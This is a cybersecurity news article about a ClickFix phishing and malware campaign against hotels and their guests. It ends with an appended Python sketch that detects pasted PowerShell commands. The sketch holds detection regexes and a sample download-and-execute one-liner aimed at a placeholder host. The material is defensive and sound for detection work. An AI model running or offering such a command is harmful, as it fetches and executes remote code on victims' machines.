
ClickFix Scam Strikes Hotels, Ignites Customer Backlash

By Staff Writer, November 10, 2025

Summary Points

  1. Targeted Cyber Attacks: Researchers discovered a widespread campaign aimed at hotels, utilizing ClickFix attacks to infiltrate systems and steal customer data as part of broader assaults on the hospitality sector.

  2. Phishing Tactics: Attackers exploited compromised Booking.com accounts to send phishing emails and messages, leveraging stolen customer data for legitimacy, ultimately leading to customer impersonation and credential theft.

  3. Malware Deployment: The campaign disseminated infostealing malware and a remote access Trojan (RAT) named PureRAT, which facilitated extensive access to compromised systems and allowed for further malicious activity.

  4. Secondary Victims: Following initial attacks, threat actors initiated downstream attacks targeting hotel customers through fraudulent communications, prompting them to verify banking details on phishing sites mimicking Booking.com.


Researchers have uncovered a broad campaign in which threat actors target hotels with ClickFix attacks to steal customer data as part of ongoing attacks against the hospitality sector that includes secondary attacks against the establishments’ customers.

Threat analysts at Sekoia.io uncovered the activity when a partner alerted them to a phishing campaign that used either emails sent from a hotel’s compromised Booking.com account or messages in WhatsApp, according to a report published Friday. Attackers had customer data, including personal identifiers and reservation details, which made their phishing attempts appear more legitimate.

After further analysis, the researchers realized the activity was part of a much broader campaign that started around April and was still active until at least October. The campaign involved a ClickFix attack spreading infostealing malware that targeted hotels and other lodging establishments, they said. It enabled the theft of professional credentials granting access to booking platforms, such as Booking.com and Expedia.

“Threat actors then either sold the harvested credentials on cybercrime forums or leveraged them directly to send fraudulent emails to hotel customers, often as part of banking fraud schemes,” Jeremy Scion, Quentin Bourgue, and Sekoia Threat Detection Response (TDR) wrote in the report. Moreover, they uncovered “hundreds of malicious domains active for several months as of October 2025, demonstrating a resilient and likely profitable campaign,” according to the report.

Targeting Hospitality Sector

The initial attack against hotels uses a compromised email account to send malicious messages to multiple hotel establishments. In some instances, attackers alter the “From” header to impersonate Booking.com, while subject lines are often related to guest matters, including references to last-minute booking, listings, reservations, and the like.

The attack chain then uses a redirection URL that ultimately leads to a ClickFix reCAPTCHA challenge in which users are prompted to copy a malicious PowerShell command. This command eventually leads to the deployment of infostealing and remote access Trojan (RAT) malware.

Sekoia.io cited March research from Microsoft that detailed attackers impersonating Booking.com in ClickFix attacks against hotels, noting that the campaigns are similar.

Cofense last June also detailed a ClickFix campaign targeting hotels that used lures regarding guests similar to the one Sekoia.io outlined. Cofense’s report noted the attacks delivered various infostealing and RAT malware as well, demonstrating consistent attack activity against the hospitality sector using ClickFix.

ClickFix Multi-Malware Delivery

ClickFix is an attack method first detailed by researchers at Proofpoint last year in which a compromised website shows users fake error messages by executing malicious code, tricking them into thinking they have to download or update software to address the issue. In reality, however, installing the “update” actually executes malware on their devices. Since its discovery, the vector has gained steady traction with threat actors.

In this campaign, the attack delivers infostealing malware that gathers various data from the compromised system, including key system information, and downloads files that lead to the launch of a RAT known as “PureRAT” for further malicious activity. The infostealer also reports status updates to its command-and-control (C2) infrastructure at each step of the attack to indicate the successful progression of the action, the researchers noted.

PureRAT is a modular malware-as-a-service (MaaS) also known as PureHVNC and ResolverRAT. Once deployed, PureRAT capabilities include remote user interface access, mouse and keyboard control, webcam and microphone capture, keylogging, file upload/download, traffic proxying, data exfiltration, and remote execution of commands or binaries, according to the Sekoia.io report.

Downstream Customer Attacks

The ClickFix attacks against hotels have led to secondary attacks against their customers, with attackers contacting them via WhatsApp or email using legitimate reservation details of the target, according to the researchers. 

“The message claimed an alleged security issue had occurred during the verification of the customer’s banking details and urged them to confirm their information,” they wrote. “To strengthen the credibility of the message, the attacker explained that this was a procedure implemented by Booking to protect against cancellations.”

Attackers then ask victims to validate banking details by visiting a URL, which leads to a phishing page that mimics Booking.com’s typography and layout and harvests the victim’s banking information.

Avoiding ClickFix Scams

The campaign is further evidence that threat actors are growing more effective across several aspects of malicious activity, including social engineering aimed at Booking.com and hospitality sites, as well as the use of related lures and commodity malware from cybercrime forums.

To help defenders avoid compromise, Sekoia.io included a list of indicators of compromise (IoCs) in the related post, including those associated with the ClickFix redirect URL, PowerShell URL, and payload; PureRAT staging and payload; and URLs involved in the phishing campaign against hotel customers.

As always, people should be suspicious of receiving unsolicited emails related to services they frequently use, and analyze them carefully even if they appear to come from a credible sender or service provider.
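Beyond IoC matching, the ClickFix step described above (a user copying a PowerShell command from a fake reCAPTCHA page) can be hunted in process-creation telemetry. The sketch below is an added example, not taken from the Sekoia.io report or from this article; the event schema, the explorer.exe parent heuristic, the trait patterns and the sample events are all assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Minimal process-creation record (hypothetical schema, e.g. from EDR or Sysmon)."""
    parent: str
    image: str
    cmdline: str

POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Assumed command-line traits of a pasted ClickFix one-liner; tune to your telemetry.
TRAITS = {
    "hidden_window": re.compile(r"-w[a-z]*\s+h(?:idden)?\b", re.I),
    "web_fetch": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "inline_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "captcha_lure": re.compile(r"captcha|not a robot", re.I),
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_traits(ev):
    """Return the names of the traits present in a PowerShell command line."""
    if basename(ev.image) not in POWERSHELL:
        return []
    return [name for name, rx in TRAITS.items() if rx.search(ev.cmdline)]

def is_suspicious(ev, min_traits=2):
    """Flag PowerShell started from the user's shell with several traits at once."""
    return basename(ev.parent) == "explorer.exe" and len(clickfix_traits(ev)) >= min_traits

# Constructed sample events; hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (irm https://lure.example.invalid/v)" # reCAPTCHA ID 4821'),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\rotate-logs.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
    ProcEvent(r"C:\Program Files\Microsoft VS Code\Code.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
              'pwsh -c "irm https://api.example.invalid/health"'),
]

def flagged(events):
    """Indexes of events that look like a user-pasted ClickFix command."""
    return [i for i, ev in enumerate(events) if is_suspicious(ev)]

if __name__ == "__main__":
    for i in flagged(SAMPLE_EVENTS):
        print(i, clickfix_traits(SAMPLE_EVENTS[i]))
```

Requiring both the interactive parent and at least two traits keeps scheduled scripts and developer tooling out of the results; a single trait on its own is common in legitimate administration.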

John Marcelli is a staff writer for the CISO Brief, with a passion for exploring and writing about the ever-evolving world of technology. From emerging trends to in-depth reviews of the latest gadgets, John stays at the forefront of innovation, delivering engaging content that informs and inspires readers. When he's not writing, he enjoys experimenting with new tech tools and diving into the digital landscape.